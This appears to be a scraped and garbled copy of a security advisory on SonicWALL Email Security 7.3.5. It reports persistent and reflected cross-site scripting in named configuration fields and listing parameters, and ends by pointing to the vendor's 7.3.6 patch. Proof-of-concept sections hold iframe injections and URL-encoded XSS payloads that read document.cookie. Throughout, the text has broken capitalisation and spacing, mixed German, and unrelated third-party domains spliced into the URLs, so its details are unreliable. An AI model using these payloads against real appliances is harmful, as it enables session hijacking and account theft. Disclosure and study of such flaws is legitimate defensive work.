Title: SonicWALL EMail Security 7.3.5-Multiple Vulnerabilities
Affected System 3.5
Product Introduction:
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From: http://www.sonicwall.com/us/products/Anti-Spam_Email_Security.html
Abstract:
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The Security research team found multiple defects in sonicwils UTM Email Security v7.3.5.6379 & Virtual Appliance
Affected products:
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SonicWall
Product: AntiSpam & EMail Security Appliance Application v7.3.5.6379
Abstract:
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1.1
Multiple persistent input validation vulnerabilities are detected in sonicwils UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows an remote attacker or local low privileged user account to inject/implement malicious persistent script
Code on application side of the email security appliance application. The vulnerabilities are located on the Compliance & Virus
Protection procedures module when processing to load unsanitized inputs as output listing of a configuration. Vulnerable values are
FloodMsgThreshold, zombieNoOfQuarantine, zombieNoOfMessageFromOneUser, safeModeNoOfQuarantine, safeModeNoOfMessageFromOneUser,
ZombieAllowEmailAddrs & floodMsgThresholdShadow. Successful exploitation of the vulnerability result in session hijacking,
Persistent phishing requests & stable persistent module context manipulation.
Vulnerable Module (s ):
[+] Virenschutzverfahren
[-] Ausgehend (Outgoing)-Listing & Exceptions
[+] Compliance Module
[-] Approval Ordner> Add new Approval Folder
1.2
Multiple client side cross site scripting vulnerabilities are detected in sonicwils UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows an remote attacker to manipulate client side appliance requests with medium required user inter action.
Successful exploitation results in sessio hijacking, account steal, client side phishing requests or manipulated context
Exection on client side requests. The vulnerabilities are located on the 'From'-& 'row' page listing values. Successful exploitation
Of the vulnerability result in client side session hijacking, non-persistent phishing requests & non-persistent module context manipulation.
Vulnerable Module (s ):
[+] Listing Page (? From &? Row)
Test proof:
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1.1
The persistent input validation vulnerabilities can be exploited by remote attackers with low privileged user accounts.
For demonstration or reproduce...
PoC: Ausgehend (Outgoing)-Listing & Exceptions
<Input disabled = "disabled" id = "floodMsgThreshold" name = "floodMsgThreshold" value = ""
Type = "hidden"> <iframe src = "www.2cto.com virus_config-Dateien/a.htm" [EXECUTE/inject persistent code!] '<"=" ">
<Input type = "hidden" id = "floodInterval" name = "floodInterval"
Value = "1"/>
... Or
<Input type = "text"
Name = "zombieNoOfQuarantine" size = "3"
Value = ""> <iframe src =
[EXECUTE/inject persistent code!] ") <"
Id = "zombieNoOfQuarantine">
... Or
Amp; lt; input type = "text"
Name = "zombieNoOfMessageFromOneUser" size = "3"
Value = ""> <iframe src =
[EXECUTE/inject persistent code!] ") <"
Id = "zombieNoOfMessageFromOneUser">
... Or
<Input type = "text"
Name = "safeModeNoOfQuarantine" size = "3"
Value = ""> <iframe src =
[EXECUTE/inject persistent code!] ") <"
Id = "safeModeNoOfQuarantine">
... Or
<Input type = "text"
Name = "safeModeNoOfMessageFromOneUser" size = "3"
Value = ""> <iframe src =
[EXECUTE/inject persistent code!] ") <"
Id = "safeModeNoOfMessageFromOneUser">
URL: http: // esserver.127.0.0.1: 8080/virus_config.html
PoC: Compliance Module-> Approval Ordner-Listing & Exceptions
<Tbody> <tr> <td background = "policy_approval_box_summary-Dateien/nav_bar_background.gif" width = "24">
</td> <td border = "0"
Background = "policy_approval_box_summary-Dateien/nav_bar_background.gif"> <span class = "column"> Approval-
Ordner </span> </td> <td border = "0" background = "policy_approval_box_summary-Dateien/nav_bar_background.gif">
<Span class = "column"> Nachrichten, die eine Genehmigung erfordern </span> </td> <td background = "policy_approval_box _
Summary-Dateien/nav_bar_background.gif "> </td> </tr> <tr>
<Td height = "12"> </td>
<Td> <a href = "http://esserver.demo.sonicwall.com/policy_approval_box.html
? Pathname = [injected persistent code!] "> <Iframe src =" yy_approval_box _
Summary-Dateien/a.htm "[execution of persistent code!] "<=" "A =" "> </td>
<Td> 0 </td>
<Td> <div
Align = "right"> <input type = "button" name = "delete" class = "button"
Value = "löschen"
URL: http://www.bkjia.com/policy_approval_box_summary.html
1.2
The client side cross site scripting vulnerability can be exploited by remote attackers with medium required user inter action.
For demonstration or reproduce...
PoC:
Http: // esserver.127.0.0.1: 8080/alert_history.html? From = 200 <% 253 ciframe % 2520src % 3Da % 2520 onload % 3 Dalert % 28document. cookie % 29% 253c
Http: // esserver.127.0.0.1: 8080/alert_history.html [post request] row = 200 <% 253 ciframe % 2520src % 3Da % 2520 onload % 3 Dalert % 28document. cookie % 29% 2520% 253c
Http: // esserver.127.0.0.1: 8080/yy_approval_box.html? Pathname = % 253 ciframe % 2520src % 3Da % 2520 onload % 3 Dalert % 28document. cookie % 29% 253c
Solution:
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The Email Security 7.3.6 patch that addresses this set of issues has now been posted and is available to all of our Email Security customers
From the download section of our customer portal (https://www.mysonicwall.com/Firmware/DownloadCenter.aspx ).
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